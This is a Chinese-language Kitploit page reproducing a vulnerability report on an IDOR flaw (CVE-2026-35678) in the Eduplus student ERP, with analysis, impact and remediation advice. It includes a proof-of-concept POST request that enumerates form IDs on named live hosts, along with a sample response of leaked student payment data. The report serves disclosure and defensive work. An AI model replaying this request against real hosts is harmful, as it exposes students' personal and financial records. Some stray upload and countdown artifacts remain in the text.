Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-35678 — # Eduplus 学生 ERP 中 IDOR 漏洞的详细漏洞研究报告 包括技术分析、PoC、影响评估和修复建议。 | Kitploit
工具/GitHubGitHub/sharma19d/cve-2026-35678
漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

# Eduplus 学生 ERP 中 IDOR 漏洞的详细漏洞研究报告 包括技术分析、PoC、影响评估和修复建议。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

漏洞研究报告:All Eduplus 学生 ERP 不安全的直接对象引用(IDOR)

研究人员:Vinay Sharma

1. 执行摘要

本报告详细介绍了在 Eduplus 学生 ERP 平台中发现的一个高严重性安全漏洞,具体位于学生学习者门户(learnerapi.pceterp.in)中。该应用程序在考试表单提交端点上存在**通用不安全的直接对象引用(IDOR)**漏洞,允许任何已认证用户(学生)通过操纵表单标识符来检索任何其他学生的敏感个人和财务数据。

该漏洞允许大规模收集学生记录数据,包括个人身份信息(PII)和详细的财务交易审计跟踪。


2. 漏洞详情

  • 目标主机: learnerapi.pceterp.in、learner.zealerp.in、learner.despu.edu.in 等
  • 受影响端点: POST /ExamForm/viewSubmitExamForm
  • 漏洞类型:
    • 不安全的直接对象引用(IDOR)[CWE-639]
    • 弱加密(使用硬编码密钥的 AES-ECB)[CWE-327, CWE-798]
    • 敏感数据暴露 [CWE-312]
  • 严重性: 高(估计 CVSS v3.1:7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

3. 技术分析

3.1 不安全的直接对象引用(IDOR)

该漏洞存在于 viewSubmitExamForm 端点中。服务器依赖两个客户端提供的参数来标识要检索的记录:

  1. 请求体: {"formid": "XXXXX"}
  2. HTTP 头: Router-Path: /view-pcu-exam-form/XXXXX

虽然用户必须经过身份验证,但服务器未能验证已认证的学生是否有权查看与所请求的 formid 关联的数据。通过遍历数字 ID,攻击者可以访问其他学生的记录。

4. 概念验证(PoC)

4.1 IDOR 利用

向易受攻击的端点发送带有修改后 formid 的标准 POST 请求即可获取敏感的学生数据。

请求:

root@kitploit:~
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (已认证头) ...

{"formid":"28984"}

响应(泄露数据摘要):

root@kitploit:~
{
  "status": "200",
  "examFormname": "B.Tech - Sem VI - Regular",
  "receipt_no": "REC/2023/54321",
  "feespaiddate": "2023-10-15",
  "ispaymentdone": {
    "username": "[email protected]",
    "received_amount": "1500.0",
    "updation_ip_address": "103.x.x.x",
    "erp_transaction_id": "ERP_998877",
    "bank_transaction_id": "BANK_ABC123",
    "paymentgateway_transaction_id": "PG_XYZ789",
    "learner": {
      "id": "12345"
    }
  }
}
5
4
3
2
1

正在上传 Idorpoc.mp4…


5. 影响评估

成功利用此漏洞可能导致:

  • 大规模 PII 暴露: 访问全体学生的姓名、电子邮件地址、学生 ID 和登录 IP 地址。
  • 财务数据泄露: 暴露交易历史、银行 ID 和支付网关参考信息。这些信息高度敏感,可能被用于财务社会工程攻击或欺诈。
  • 学术隐私侵犯: 未经授权访问考试表单、导师分配和提交状态。

6. 修复建议

6.1 授权修复(优先级:高)

  • 实施服务器端授权检查: 后端必须验证所请求的 formid 是否属于与活动会话关联的 learnerid。切勿在未根据已认证会话令牌进行验证的情况下信任 formid 或 Router-Path 参数。

6.3 常规加固

  • 最小化数据输出: 确保 API 仅返回特定 UI 视图所需的字段。除非用户工作流程绝对需要,否则应删除内部交易 ID 和 IP 地址。
  • 会话安全: 审查使用自定义加密头进行会话管理的做法,并考虑使用标准的、加固的 JWT 或安全的仅 HTTP Cookie。
下载工具